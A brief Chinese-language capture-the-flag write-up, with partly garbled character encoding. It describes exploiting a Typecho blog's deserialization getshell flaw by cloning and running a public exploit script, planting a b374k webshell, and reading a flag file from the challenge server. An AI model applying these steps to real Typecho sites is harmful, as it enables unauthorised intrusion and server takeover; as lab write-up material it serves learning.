首先打開是一個(gè)博客的樣子,里面寫有提示

那么搜一下吧,發(fā)現(xiàn)這是typecho有g(shù)etshell的漏洞,利用步驟:
git clone https://github.com/BennyThink/Typecho_deserialization_exploit
cd Typecho_deserialization_exploit
python exp.py
按使用步驟寫入webshell,之后可以進(jìn)入b374k.php,可以看到文件目錄,看到一個(gè)與flag有關(guān)的文件,直接在目錄上http://123.206.87.240:9003/文件名,就可以獲得flag。